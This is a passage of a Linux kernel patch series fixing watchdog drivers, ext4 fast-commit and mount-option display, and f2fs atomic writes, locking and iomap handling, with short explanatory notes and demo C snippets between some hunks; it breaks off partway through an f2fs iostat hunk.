+--- a/drivers/watchdog/pcwd_usb.c
++++ b/drivers/watchdog/pcwd_usb.c
+@@ -325,7 +325,8 @@ static int usb_pcwd_set_heartbeat(struct usb_pcwd_private *usb_pcwd, int t)
+ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ 							int *temperature)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	usb_pcwd_send_command(usb_pcwd, CMD_READ_TEMP, &msb, &lsb);
+ 
+@@ -341,7 +342,8 @@ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ static int usb_pcwd_get_timeleft(struct usb_pcwd_private *usb_pcwd,
+ 								int *time_left)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	/* Read the time that's left before rebooting */
+ 	/* Note: if the board is not yet armed then we will read 0xFFFF */
+diff --git a/drivers/watchdog/rzg2l_wdt.c b/drivers/watchdog/rzg2l_wdt.c
+index 974a4194a8fd6..d404953d0e0f4 100644
+--- a/drivers/watchdog/rzg2l_wdt.c
++++ b/drivers/watchdog/rzg2l_wdt.c
+@@ -8,6 +8,7 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -35,6 +36,8 @@
+ 
+ #define F2CYCLE_NSEC(f)			(1000000000 / (f))
+ 
++#define RZV2M_A_NSEC			730
++
+ static bool nowayout = WATCHDOG_NOWAYOUT;
+ module_param(nowayout, bool, 0);
+ MODULE_PARM_DESC(nowayout, "Watchdog cannot be stopped once started (default="
+@@ -51,11 +54,35 @@ struct rzg2l_wdt_priv {
+ 	struct reset_control *rstc;
+ 	unsigned long osc_clk_rate;
+ 	unsigned long delay;
++	unsigned long minimum_assertion_period;
+ 	struct clk *pclk;
+ 	struct clk *osc_clk;
+ 	enum rz_wdt_type devtype;
+ };
+ 
++static int rzg2l_wdt_reset(struct rzg2l_wdt_priv *priv)
++{
++	int err, status;
++
++	if (priv->devtype == WDT_RZV2M) {
++		/* WDT needs TYPE-B reset control */
++		err = reset_control_assert(priv->rstc);
++		if (err)
++			return err;
++		ndelay(priv->minimum_assertion_period);
++		err = reset_control_deassert(priv->rstc);
++		if (err)
++			return err;
++		err = read_poll_timeout(reset_control_status, status,
++					status != 1, 0, 1000, false,
++					priv->rstc);
++	} else {
++		err = reset_control_reset(priv->rstc);
++	}
++
++	return err;
++}
++
+ static void rzg2l_wdt_wait_delay(struct rzg2l_wdt_priv *priv)
+ {
+ 	/* delay timer when changing the setting register */
+@@ -115,25 +142,23 @@ static int rzg2l_wdt_stop(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+ 
++	rzg2l_wdt_reset(priv);
+ 	pm_runtime_put(wdev->parent);
+-	reset_control_reset(priv->rstc);
+ 
+ 	return 0;
+ }
+ 
+ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int timeout)
+ {
+-	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+-
+ 	wdev->timeout = timeout;
+ 
+ 	/*
+ 	 * If the watchdog is active, reset the module for updating the WDTSET
+-	 * register so that it is updated with new timeout values.
++	 * register by calling rzg2l_wdt_stop() (which internally calls reset_control_reset()
++	 * to reset the module) so that it is updated with new timeout values.
+ 	 */
+ 	if (watchdog_active(wdev)) {
+-		pm_runtime_put(wdev->parent);
+-		reset_control_reset(priv->rstc);
++		rzg2l_wdt_stop(wdev);
+ 		rzg2l_wdt_start(wdev);
+ 	}
+ 
+@@ -156,6 +181,7 @@ static int rzg2l_wdt_restart(struct watchdog_device *wdev,
+ 		rzg2l_wdt_write(priv, PEEN_FORCE, PEEN);
+ 	} else {
+ 		/* RZ/V2M doesn't have parity error registers */
++		rzg2l_wdt_reset(priv);
+ 
+ 		wdev->timeout = 0;
+ 
+@@ -253,6 +279,13 @@ static int rzg2l_wdt_probe(struct platform_device *pdev)
+ 
+ 	priv->devtype = (uintptr_t)of_device_get_match_data(dev);
+ 
++	if (priv->devtype == WDT_RZV2M) {
++		priv->minimum_assertion_period = RZV2M_A_NSEC +
++			3 * F2CYCLE_NSEC(pclk_rate) + 5 *
++			max(F2CYCLE_NSEC(priv->osc_clk_rate),
++			    F2CYCLE_NSEC(pclk_rate));
++	}
++
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	priv->wdev.info = &rzg2l_wdt_ident;
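
rzg2l_wdt_reset() waits for the RZ/V2M TYPE-B reset to actually deassert with read_poll_timeout(), which re-evaluates op(args...) into val until cond holds or timeout_us expires. A condensed sketch of the same idiom, mirroring the call in the hunk above:

	#include <linux/iopoll.h>
	#include <linux/reset.h>

	static int demo_wait_deasserted(struct reset_control *rstc)
	{
		int status;

		/*
		 * Busy-poll reset_control_status(rstc) (sleep_us == 0, no
		 * sleep before the first read) until it stops reporting
		 * asserted (1), giving up after 1000 us. Returns 0 on
		 * success or -ETIMEDOUT.
		 */
		return read_poll_timeout(reset_control_status, status,
					 status != 1, 0, 1000, false, rstc);
	}
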
+diff --git a/drivers/watchdog/sbsa_gwdt.c b/drivers/watchdog/sbsa_gwdt.c
+index 9791c74aebd48..63862803421f1 100644
+--- a/drivers/watchdog/sbsa_gwdt.c
++++ b/drivers/watchdog/sbsa_gwdt.c
+@@ -150,6 +150,7 @@ static int sbsa_gwdt_set_timeout(struct watchdog_device *wdd,
+ 	struct sbsa_gwdt *gwdt = watchdog_get_drvdata(wdd);
+ 
+ 	wdd->timeout = timeout;
++	timeout = clamp_t(unsigned int, timeout, 1, wdd->max_hw_heartbeat_ms / 1000);
+ 
+ 	if (action)
+ 		sbsa_gwdt_reg_write(gwdt->clk * timeout, gwdt);
+diff --git a/drivers/watchdog/watchdog_dev.c b/drivers/watchdog/watchdog_dev.c
+index 55574ed425042..fdffa6859dde3 100644
+--- a/drivers/watchdog/watchdog_dev.c
++++ b/drivers/watchdog/watchdog_dev.c
+@@ -1061,8 +1061,8 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 		if (wdd->id == 0) {
+ 			misc_deregister(&watchdog_miscdev);
+ 			old_wd_data = NULL;
+-			put_device(&wd_data->dev);
+ 		}
++		put_device(&wd_data->dev);
+ 		return err;
+ 	}
+ 
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 140e1eb300d17..6479146140d20 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1529,6 +1529,7 @@ struct ext4_sb_info {
+ 	unsigned int s_mount_opt2;
+ 	unsigned long s_mount_flags;
+ 	unsigned int s_def_mount_opt;
++	unsigned int s_def_mount_opt2;
+ 	ext4_fsblk_t s_sb_block;
+ 	atomic64_t s_resv_clusters;
+ 	kuid_t s_resuid;
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 4594b62f147bb..b06de728b3b6c 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -1332,8 +1332,14 @@ struct dentry_info_args {
+ 	char *dname;
+ };
+ 
++/* Same as struct ext4_fc_tl, but uses native endianness fields */
++struct ext4_fc_tl_mem {
++	u16 fc_tag;
++	u16 fc_len;
++};
++
+ static inline void tl_to_darg(struct dentry_info_args *darg,
+-			      struct ext4_fc_tl *tl, u8 *val)
++			      struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_dentry_info fcd;
+ 
+@@ -1345,16 +1351,18 @@ static inline void tl_to_darg(struct dentry_info_args *darg,
+ 	darg->dname_len = tl->fc_len - sizeof(struct ext4_fc_dentry_info);
+ }
+ 
+-static inline void ext4_fc_get_tl(struct ext4_fc_tl *tl, u8 *val)
++static inline void ext4_fc_get_tl(struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+-	memcpy(tl, val, EXT4_FC_TAG_BASE_LEN);
+-	tl->fc_len = le16_to_cpu(tl->fc_len);
+-	tl->fc_tag = le16_to_cpu(tl->fc_tag);
++	struct ext4_fc_tl tl_disk;
++
++	memcpy(&tl_disk, val, EXT4_FC_TAG_BASE_LEN);
++	tl->fc_len = le16_to_cpu(tl_disk.fc_len);
++	tl->fc_tag = le16_to_cpu(tl_disk.fc_tag);
+ }
+ 
+ /* Unlink replay function */
+-static int ext4_fc_replay_unlink(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_unlink(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode, *old_parent;
+ 	struct qstr entry;
+@@ -1451,8 +1459,8 @@ out:
+ }
+ 
+ /* Link replay function */
+-static int ext4_fc_replay_link(struct super_block *sb, struct ext4_fc_tl *tl,
+-			       u8 *val)
++static int ext4_fc_replay_link(struct super_block *sb,
++			       struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct dentry_info_args darg;
+@@ -1506,8 +1514,8 @@ static int ext4_fc_record_modified_inode(struct super_block *sb, int ino)
+ /*
+  * Inode replay function
+  */
+-static int ext4_fc_replay_inode(struct super_block *sb, struct ext4_fc_tl *tl,
+-				u8 *val)
++static int ext4_fc_replay_inode(struct super_block *sb,
++				struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_inode fc_inode;
+ 	struct ext4_inode *raw_inode;
+@@ -1609,8 +1617,8 @@ out:
+  * inode for which we are trying to create a dentry here, should already have
+  * been replayed before we start here.
+  */
+-static int ext4_fc_replay_create(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_create(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	int ret = 0;
+ 	struct inode *inode = NULL;
+@@ -1708,7 +1716,7 @@ int ext4_fc_record_regions(struct super_block *sb, int ino,
+ 
+ /* Replay add range tag */
+ static int ext4_fc_replay_add_range(struct super_block *sb,
+-				    struct ext4_fc_tl *tl, u8 *val)
++				    struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_add_range fc_add_ex;
+ 	struct ext4_extent newex, *ex;
+@@ -1828,8 +1836,8 @@ out:
+ 
+ /* Replay DEL_RANGE tag */
+ static int
+-ext4_fc_replay_del_range(struct super_block *sb, struct ext4_fc_tl *tl,
+-			 u8 *val)
++ext4_fc_replay_del_range(struct super_block *sb,
++			 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct ext4_fc_del_range lrange;
+@@ -2025,7 +2033,7 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	struct ext4_fc_replay_state *state;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_add_range ext;
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	struct ext4_fc_tail tail;
+ 	__u8 *start, *end, *cur, *val;
+ 	struct ext4_fc_head head;
+@@ -2144,7 +2152,7 @@ static int ext4_fc_replay(journal_t *journal, struct buffer_head *bh,
+ {
+ 	struct super_block *sb = journal->j_private;
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	__u8 *start, *end, *cur, *val;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_replay_state *state = &sbi->s_fc_replay_state;
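
The fast-commit fix splits the on-disk and in-memory views of a tag/length header: the old code byte-swapped values in place inside struct ext4_fc_tl, storing native-endian values into __le16 fields. struct ext4_fc_tl_mem gives the swapped values a home with plain u16 members. The pattern in miniature, with hypothetical demo_* names:

	#include <linux/kernel.h>
	#include <linux/string.h>
	#include <linux/types.h>

	/* On-disk layout: explicitly little-endian. */
	struct demo_tl_disk {
		__le16 tag;
		__le16 len;
	};

	/* In-memory mirror: native endianness, safe to compare directly. */
	struct demo_tl_mem {
		u16 tag;
		u16 len;
	};

	static void demo_get_tl(struct demo_tl_mem *tl, const u8 *val)
	{
		struct demo_tl_disk disk;

		memcpy(&disk, val, sizeof(disk));	/* val may be unaligned */
		tl->tag = le16_to_cpu(disk.tag);
		tl->len = le16_to_cpu(disk.len);
	}

On little-endian machines the in-place swap is value-preserving, so the mixed-endianness struct mostly worked by accident; the dedicated in-memory struct makes the conversion explicit and type-correct.
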
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 260c1b3e3ef2c..c81fa0fa9901a 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -2146,7 +2146,7 @@ static int ext4_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 		return 0;
+ 	case Opt_commit:
+ 		if (result.uint_32 == 0)
+-			ctx->s_commit_interval = JBD2_DEFAULT_MAX_COMMIT_AGE;
++			result.uint_32 = JBD2_DEFAULT_MAX_COMMIT_AGE;
+ 		else if (result.uint_32 > INT_MAX / HZ) {
+ 			ext4_msg(NULL, KERN_ERR,
+ 				 "Invalid commit interval %d, "
+@@ -2894,7 +2894,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+-	int def_errors, def_mount_opt = sbi->s_def_mount_opt;
++	int def_errors;
+ 	const struct mount_opts *m;
+ 	char sep = nodefs ? '\n' : ',';
+ 
+@@ -2906,15 +2906,28 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 
+ 	for (m = ext4_mount_opts; m->token != Opt_err; m++) {
+ 		int want_set = m->flags & MOPT_SET;
++		int opt_2 = m->flags & MOPT_2;
++		unsigned int mount_opt, def_mount_opt;
++
+ 		if (((m->flags & (MOPT_SET|MOPT_CLEAR)) == 0) ||
+ 		    m->flags & MOPT_SKIP)
+ 			continue;
+-		if (!nodefs && !(m->mount_opt & (sbi->s_mount_opt ^ def_mount_opt)))
+-			continue; /* skip if same as the default */
++
++		if (opt_2) {
++			mount_opt = sbi->s_mount_opt2;
++			def_mount_opt = sbi->s_def_mount_opt2;
++		} else {
++			mount_opt = sbi->s_mount_opt;
++			def_mount_opt = sbi->s_def_mount_opt;
++		}
++		/* skip if same as the default */
++		if (!nodefs && !(m->mount_opt & (mount_opt ^ def_mount_opt)))
++			continue;
++		/* select Opt_noFoo vs Opt_Foo */
+ 		if ((want_set &&
+-		     (sbi->s_mount_opt & m->mount_opt) != m->mount_opt) ||
+-		    (!want_set && (sbi->s_mount_opt & m->mount_opt)))
+-			continue; /* select Opt_noFoo vs Opt_Foo */
++		     (mount_opt & m->mount_opt) != m->mount_opt) ||
++		    (!want_set && (mount_opt & m->mount_opt)))
++			continue;
+ 		SEQ_OPTS_PRINT("%s", token2str(m->token));
+ 	}
+ 
+@@ -2942,7 +2955,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 	if (nodefs || sbi->s_stripe)
+ 		SEQ_OPTS_PRINT("stripe=%lu", sbi->s_stripe);
+ 	if (nodefs || EXT4_MOUNT_DATA_FLAGS &
+-			(sbi->s_mount_opt ^ def_mount_opt)) {
++			(sbi->s_mount_opt ^ sbi->s_def_mount_opt)) {
+ 		if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_JOURNAL_DATA)
+ 			SEQ_OPTS_PUTS("data=journal");
+ 		else if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_ORDERED_DATA)
+@@ -5086,6 +5099,7 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		goto failed_mount;
+ 
+ 	sbi->s_def_mount_opt = sbi->s_mount_opt;
++	sbi->s_def_mount_opt2 = sbi->s_mount_opt2;
+ 
+ 	err = ext4_check_opt_consistency(fc, sb);
+ 	if (err < 0)
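
The show-options rework applies one mask trick to both option words: XOR-ing the current flags with the defaults captured at mount time leaves a bit set exactly where a flag changed, so m->mount_opt & (mount_opt ^ def_mount_opt) is non-zero only for options worth printing. A two-line userspace illustration with made-up flags:

	#include <stdio.h>

	#define OPT_FOO 0x1u
	#define OPT_BAR 0x2u

	int main(void)
	{
		unsigned int def = OPT_FOO;		/* default: foo on, bar off */
		unsigned int cur = OPT_FOO | OPT_BAR;	/* user enabled bar */

		/* Only bits that differ from the default survive the XOR. */
		printf("foo changed: %u\n", !!(OPT_FOO & (cur ^ def)));	/* 0 */
		printf("bar changed: %u\n", !!(OPT_BAR & (cur ^ def)));	/* 1 */
		return 0;
	}

Before this fix only s_mount_opt had a saved default, so MOPT_2 options were compared against the wrong word; s_def_mount_opt2, added in the ext4.h hunk earlier, supplies the missing baseline.
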
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 8cca566baf3ab..a28d05895f5c7 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2535,34 +2535,29 @@ static inline bool check_inplace_update_policy(struct inode *inode,
+ 				struct f2fs_io_info *fio)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	unsigned int policy = SM_I(sbi)->ipu_policy;
+ 
+-	if (policy & (0x1 << F2FS_IPU_HONOR_OPU_WRITE) &&
+-			is_inode_flag_set(inode, FI_OPU_WRITE))
++	if (IS_F2FS_IPU_HONOR_OPU_WRITE(sbi) &&
++	    is_inode_flag_set(inode, FI_OPU_WRITE))
+ 		return false;
+-	if (policy & (0x1 << F2FS_IPU_FORCE))
++	if (IS_F2FS_IPU_FORCE(sbi))
+ 		return true;
+-	if (policy & (0x1 << F2FS_IPU_SSR) && f2fs_need_SSR(sbi))
++	if (IS_F2FS_IPU_SSR(sbi) && f2fs_need_SSR(sbi))
+ 		return true;
+-	if (policy & (0x1 << F2FS_IPU_UTIL) &&
+-			utilization(sbi) > SM_I(sbi)->min_ipu_util)
++	if (IS_F2FS_IPU_UTIL(sbi) && utilization(sbi) > SM_I(sbi)->min_ipu_util)
+ 		return true;
+-	if (policy & (0x1 << F2FS_IPU_SSR_UTIL) && f2fs_need_SSR(sbi) &&
+-			utilization(sbi) > SM_I(sbi)->min_ipu_util)
++	if (IS_F2FS_IPU_SSR_UTIL(sbi) && f2fs_need_SSR(sbi) &&
++	    utilization(sbi) > SM_I(sbi)->min_ipu_util)
+ 		return true;
+ 
+ 	/*
+ 	 * IPU for rewrite async pages
+ 	 */
+-	if (policy & (0x1 << F2FS_IPU_ASYNC) &&
+-			fio && fio->op == REQ_OP_WRITE &&
+-			!(fio->op_flags & REQ_SYNC) &&
+-			!IS_ENCRYPTED(inode))
++	if (IS_F2FS_IPU_ASYNC(sbi) && fio && fio->op == REQ_OP_WRITE &&
++	    !(fio->op_flags & REQ_SYNC) && !IS_ENCRYPTED(inode))
+ 		return true;
+ 
+ 	/* this is only set during fdatasync */
+-	if (policy & (0x1 << F2FS_IPU_FSYNC) &&
+-			is_inode_flag_set(inode, FI_NEED_IPU))
++	if (IS_F2FS_IPU_FSYNC(sbi) && is_inode_flag_set(inode, FI_NEED_IPU))
+ 		return true;
+ 
+ 	if (unlikely(fio && is_sbi_flag_set(sbi, SBI_CP_DISABLED) &&
+@@ -4155,20 +4150,24 @@ static int f2fs_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
+ 	 */
+ 	map.m_len = fscrypt_limit_io_blocks(inode, map.m_lblk, map.m_len);
+ 
+-	if (map.m_flags & (F2FS_MAP_MAPPED | F2FS_MAP_UNWRITTEN)) {
+-		iomap->length = blks_to_bytes(inode, map.m_len);
+-		if (map.m_flags & F2FS_MAP_MAPPED) {
+-			iomap->type = IOMAP_MAPPED;
+-			iomap->flags |= IOMAP_F_MERGED;
+-		} else {
+-			iomap->type = IOMAP_UNWRITTEN;
+-		}
+-		if (WARN_ON_ONCE(!__is_valid_data_blkaddr(map.m_pblk)))
+-			return -EINVAL;
++	/*
++	 * We should never see delalloc or compressed extents here based on
++	 * prior flushing and checks.
++	 */
++	if (WARN_ON_ONCE(map.m_pblk == NEW_ADDR))
++		return -EINVAL;
++	if (WARN_ON_ONCE(map.m_pblk == COMPRESS_ADDR))
++		return -EINVAL;
+ 
++	if (map.m_pblk != NULL_ADDR) {
++		iomap->length = blks_to_bytes(inode, map.m_len);
++		iomap->type = IOMAP_MAPPED;
++		iomap->flags |= IOMAP_F_MERGED;
+ 		iomap->bdev = map.m_bdev;
+ 		iomap->addr = blks_to_bytes(inode, map.m_pblk);
+ 	} else {
++		if (flags & IOMAP_WRITE)
++			return -ENOTBLK;
+ 		iomap->length = blks_to_bytes(inode, next_pgofs) -
+ 				iomap->offset;
+ 		iomap->type = IOMAP_HOLE;
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index ecbc8c135b494..05297427552ac 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -619,7 +619,7 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 		fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page),
+ 							dn->inode) + ofs;
+ 		f2fs_update_read_extent_cache_range(dn, fofs, 0, len);
+-		f2fs_update_age_extent_cache_range(dn, fofs, nr_free);
++		f2fs_update_age_extent_cache_range(dn, fofs, len);
+ 		dec_valid_block_count(sbi, dn->inode, nr_free);
+ 	}
+ 	dn->ofs_in_node = ofs;
+@@ -1498,6 +1498,7 @@ static int f2fs_do_zero_range(struct dnode_of_data *dn, pgoff_t start,
+ 	}
+ 
+ 	f2fs_update_read_extent_cache_range(dn, start, 0, index - start);
++	f2fs_update_age_extent_cache_range(dn, start, index - start);
+ 
+ 	return ret;
+ }
+@@ -1866,7 +1867,10 @@ static int f2fs_release_file(struct inode *inode, struct file *filp)
+ 			atomic_read(&inode->i_writecount) != 1)
+ 		return 0;
+ 
++	inode_lock(inode);
+ 	f2fs_abort_atomic_write(inode, true);
++	inode_unlock(inode);
++
+ 	return 0;
+ }
+ 
+@@ -1880,8 +1884,13 @@ static int f2fs_file_flush(struct file *file, fl_owner_t id)
+ 	 * until all the writers close its file. Since this should be done
+ 	 * before dropping file lock, it needs to do in ->flush.
+ 	 */
+-	if (F2FS_I(inode)->atomic_write_task == current)
++	if (F2FS_I(inode)->atomic_write_task == current &&
++				(current->flags & PF_EXITING)) {
++		inode_lock(inode);
+ 		f2fs_abort_atomic_write(inode, true);
++		inode_unlock(inode);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2087,19 +2096,28 @@ static int f2fs_ioc_start_atomic_write(struct file *filp, bool truncate)
+ 		goto out;
+ 	}
+ 
+-	/* Create a COW inode for atomic write */
+-	pinode = f2fs_iget(inode->i_sb, fi->i_pino);
+-	if (IS_ERR(pinode)) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		ret = PTR_ERR(pinode);
+-		goto out;
+-	}
++	/* Check if the inode already has a COW inode */
++	if (fi->cow_inode == NULL) {
++		/* Create a COW inode for atomic write */
++		pinode = f2fs_iget(inode->i_sb, fi->i_pino);
++		if (IS_ERR(pinode)) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			ret = PTR_ERR(pinode);
++			goto out;
++		}
+ 
+-	ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
+-	iput(pinode);
+-	if (ret) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		goto out;
++		ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
++		iput(pinode);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
++
++		set_inode_flag(fi->cow_inode, FI_COW_FILE);
++		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
++	} else {
++		/* Reuse the already created COW inode */
++		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
+ 	}
+ 
+ 	f2fs_write_inode(inode, NULL);
+@@ -2107,8 +2125,6 @@ static int f2fs_ioc_start_atomic_write(struct file *filp, bool truncate)
+ 	stat_inc_atomic_inode(inode);
+ 
+ 	set_inode_flag(inode, FI_ATOMIC_FILE);
+-	set_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 
+ 	isize = i_size_read(inode);
+ 	fi->original_i_size = isize;
+@@ -2338,6 +2354,7 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ {
+ 	struct inode *inode = file_inode(filp);
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	u8 encrypt_pw_salt[16];
+ 	int err;
+ 
+ 	if (!f2fs_sb_has_encrypt(sbi))
+@@ -2362,12 +2379,14 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ 		goto out_err;
+ 	}
+ got_it:
+-	if (copy_to_user((__u8 __user *)arg, sbi->raw_super->encrypt_pw_salt,
+-									16))
+-		err = -EFAULT;
++	memcpy(encrypt_pw_salt, sbi->raw_super->encrypt_pw_salt, 16);
+ out_err:
+ 	f2fs_up_write(&sbi->sb_lock);
+ 	mnt_drop_write_file(filp);
++
++	if (!err && copy_to_user((__u8 __user *)arg, encrypt_pw_salt, 16))
++		err = -EFAULT;
++
+ 	return err;
+ }
+ 
+@@ -3942,7 +3961,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (inode->i_size != 0) {
++	if (F2FS_HAS_BLOCKS(inode)) {
+ 		ret = -EFBIG;
+ 		goto out;
+ 	}
+@@ -4823,6 +4842,7 @@ long f2fs_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ 	case F2FS_IOC32_MOVE_RANGE:
+ 		return f2fs_compat_ioc_move_range(file, arg);
+ 	case F2FS_IOC_START_ATOMIC_WRITE:
++	case F2FS_IOC_START_ATOMIC_REPLACE:
+ 	case F2FS_IOC_COMMIT_ATOMIC_WRITE:
+ 	case F2FS_IOC_START_VOLATILE_WRITE:
+ 	case F2FS_IOC_RELEASE_VOLATILE_WRITE:
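
The pwsalt hunk above snapshots the salt into a stack buffer while sbi->sb_lock is held and defers copy_to_user() until after the lock (and the write reference) are dropped: copy_to_user() can fault, and the fault path may re-enter the filesystem and contend for the same lock. The general shape, with a hypothetical lock and payload:

	#include <linux/errno.h>
	#include <linux/mutex.h>
	#include <linux/string.h>
	#include <linux/types.h>
	#include <linux/uaccess.h>

	static DEFINE_MUTEX(demo_lock);
	static u8 demo_salt[16];

	static long demo_read_salt(u8 __user *ubuf)
	{
		u8 tmp[16];

		mutex_lock(&demo_lock);
		memcpy(tmp, demo_salt, sizeof(tmp));	/* snapshot under the lock */
		mutex_unlock(&demo_lock);

		/* The faultable copy runs with no locks held. */
		if (copy_to_user(ubuf, tmp, sizeof(tmp)))
			return -EFAULT;
		return 0;
	}
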
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index fb489f55fef3a..f438f39ae3f3e 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -413,12 +413,6 @@ static int do_read_inode(struct inode *inode)
+ 		fi->i_inline_xattr_size = 0;
+ 	}
+ 
+-	if (!sanity_check_inode(inode, node_page)) {
+-		f2fs_put_page(node_page, 1);
+-		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	/* check data exist */
+ 	if (f2fs_has_inline_data(inode) && !f2fs_exist_data(inode))
+ 		__recover_inline_status(inode, node_page);
+@@ -482,6 +476,12 @@ static int do_read_inode(struct inode *inode)
+ 	f2fs_init_read_extent_tree(inode, node_page);
+ 	f2fs_init_age_extent_tree(inode);
+ 
++	if (!sanity_check_inode(inode, node_page)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
+ 	f2fs_put_page(node_page, 1);
+ 
+ 	stat_inc_inline_xattr(inode);
+@@ -767,11 +767,18 @@ int f2fs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ void f2fs_evict_inode(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	nid_t xnid = F2FS_I(inode)->i_xattr_nid;
++	struct f2fs_inode_info *fi = F2FS_I(inode);
++	nid_t xnid = fi->i_xattr_nid;
+ 	int err = 0;
+ 
+ 	f2fs_abort_atomic_write(inode, true);
+ 
++	if (fi->cow_inode) {
++		clear_inode_flag(fi->cow_inode, FI_COW_FILE);
++		iput(fi->cow_inode);
++		fi->cow_inode = NULL;
++	}
++
+ 	trace_f2fs_evict_inode(inode);
+ 	truncate_inode_pages_final(&inode->i_data);
+ 
+@@ -858,7 +865,7 @@ no_delete:
+ 	stat_dec_inline_inode(inode);
+ 	stat_dec_compr_inode(inode);
+ 	stat_sub_compr_blocks(inode,
+-			atomic_read(&F2FS_I(inode)->i_compr_blocks));
++			atomic_read(&fi->i_compr_blocks));
+ 
+ 	if (likely(!f2fs_cp_error(sbi) &&
+ 				!is_sbi_flag_set(sbi, SBI_CP_DISABLED)))
+diff --git a/fs/f2fs/iostat.c b/fs/f2fs/iostat.c
+index 3166a8939ed4f..02393c95c9f86 100644
+--- a/fs/f2fs/iostat.c
++++ b/fs/f2fs/iostat.c
+@@ -227,8 +227,12 @@ static inline void __update_iostat_latency(struct bio_iostat_ctx *iostat_ctx,
+ 		return;
+ 
+ 	ts_diff = jiffies - iostat_ctx->submit_ts;
+-	if (iotype >= META_FLUSH)
++	if (iotype == META_FLUSH) {
+ 		iotype = META;
++	} else if (iotype >= NR_PAGE_TYPE) {
